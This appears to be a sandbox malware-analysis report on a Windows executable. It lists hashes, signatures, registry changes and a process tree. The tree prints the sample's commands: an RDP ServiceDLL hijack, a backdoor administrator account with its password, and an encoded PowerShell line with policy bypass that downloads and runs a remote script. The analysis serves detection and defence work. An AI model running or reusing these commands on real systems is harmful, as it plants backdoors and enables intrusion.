Analysis
-
max time kernel
48s -
max time network
117s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 20:56
Static task
static1
Behavioral task
behavioral1
Sample
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Resource
win10v20201028
General
-
Target
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
-
Size
3.4MB
-
MD5
442016bf1c6123cc40ff23c3637396c0
-
SHA1
cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
-
SHA256
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
-
SHA512
d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 21 420 powershell.exe 23 420 powershell.exe 24 420 powershell.exe 25 420 powershell.exe 27 420 powershell.exe 29 420 powershell.exe 31 420 powershell.exe 33 420 powershell.exe 35 420 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1020 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1160 1160 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_x3yyqkwl.ntw.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBAD.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBFD.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBBE.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_luiem2ot.wui.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB0F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB9D.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 7fd9c04391add601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 420 powershell.exe 420 powershell.exe 420 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.exedescription pid process target process PID 580 wrote to memory of 1020 580 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 580 wrote to memory of 1020 580 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe powershell.exe PID 1020 wrote to memory of 3584 1020 powershell.exe csc.exe PID 1020 wrote to memory of 3584 1020 powershell.exe csc.exe PID 3584 wrote to memory of 2400 3584 csc.exe cvtres.exe PID 3584 wrote to memory of 2400 3584 csc.exe cvtres.exe PID 1020 wrote to memory of 212 1020 powershell.exe reg.exe PID 1020 wrote to memory of 212 1020 powershell.exe reg.exe PID 1020 wrote to memory of 196 1020 powershell.exe reg.exe PID 1020 wrote to memory of 196 1020 powershell.exe reg.exe PID 1020 wrote to memory of 732 1020 powershell.exe reg.exe PID 1020 wrote to memory of 732 1020 powershell.exe reg.exe PID 1020 wrote to memory of 3008 1020 powershell.exe net.exe PID 1020 wrote to memory of 3008 1020 powershell.exe net.exe PID 3008 wrote to memory of 4012 3008 net.exe net1.exe PID 3008 wrote to memory of 4012 3008 net.exe net1.exe PID 1020 wrote to memory of 2400 1020 powershell.exe cmd.exe PID 1020 wrote to memory of 2400 1020 powershell.exe cmd.exe PID 2400 wrote to memory of 3680 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 3680 2400 cmd.exe cmd.exe PID 3680 wrote to memory of 2944 3680 cmd.exe net.exe PID 3680 wrote to memory of 2944 3680 cmd.exe net.exe PID 2944 wrote to memory of 1724 2944 net.exe net1.exe PID 2944 wrote to memory of 1724 2944 net.exe net1.exe PID 1020 wrote to memory of 2308 1020 powershell.exe cmd.exe PID 1020 wrote to memory of 2308 1020 powershell.exe cmd.exe PID 2308 wrote to memory of 1000 2308 cmd.exe cmd.exe PID 2308 wrote to memory of 1000 2308 cmd.exe cmd.exe PID 1000 wrote to memory of 1056 1000 cmd.exe net.exe PID 1000 wrote to memory of 1056 1000 cmd.exe net.exe PID 1056 wrote to memory of 2060 1056 net.exe net1.exe PID 1056 wrote to memory of 2060 1056 net.exe net1.exe PID 3080 wrote to memory of 1600 3080 cmd.exe net.exe PID 3080 wrote to memory of 1600 3080 cmd.exe net.exe PID 1600 wrote to memory of 1500 1600 net.exe net1.exe PID 1600 wrote to memory of 1500 1600 net.exe net1.exe PID 1060 wrote to memory of 508 1060 cmd.exe net.exe PID 1060 wrote to memory of 508 1060 cmd.exe net.exe PID 508 wrote to memory of 3500 508 net.exe net1.exe PID 508 wrote to memory of 3500 508 net.exe net1.exe PID 3708 wrote to memory of 3792 3708 cmd.exe net.exe PID 3708 wrote to memory of 3792 3708 cmd.exe net.exe PID 3792 wrote to memory of 912 3792 net.exe net1.exe PID 3792 wrote to memory of 912 3792 net.exe net1.exe PID 1724 wrote to memory of 2400 1724 cmd.exe net.exe PID 1724 wrote to memory of 2400 1724 cmd.exe net.exe PID 2400 wrote to memory of 1336 2400 net.exe net1.exe PID 2400 wrote to memory of 1336 2400 net.exe net1.exe PID 3932 wrote to memory of 1704 3932 cmd.exe net.exe PID 3932 wrote to memory of 1704 3932 cmd.exe net.exe PID 1704 wrote to memory of 2212 1704 net.exe net1.exe PID 1704 wrote to memory of 2212 1704 net.exe net1.exe PID 772 wrote to memory of 3048 772 cmd.exe net.exe PID 772 wrote to memory of 3048 772 cmd.exe net.exe PID 3048 wrote to memory of 188 3048 net.exe net1.exe PID 3048 wrote to memory of 188 3048 net.exe net1.exe PID 500 wrote to memory of 3024 500 cmd.exe WMIC.exe PID 500 wrote to memory of 3024 500 cmd.exe WMIC.exe PID 804 wrote to memory of 2944 804 cmd.exe WMIC.exe PID 804 wrote to memory of 2944 804 cmd.exe WMIC.exe PID 1020 wrote to memory of 1492 1020 powershell.exe cmd.exe PID 1020 wrote to memory of 1492 1020 powershell.exe cmd.exe PID 496 wrote to memory of 3008 496 cmd.exe cmd.exe PID 496 wrote to memory of 3008 496 cmd.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72E4.tmp" "c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aG4xSuFP /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin aG4xSuFP /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aG4xSuFP /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aG4xSuFP1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin aG4xSuFP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aG4xSuFP3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
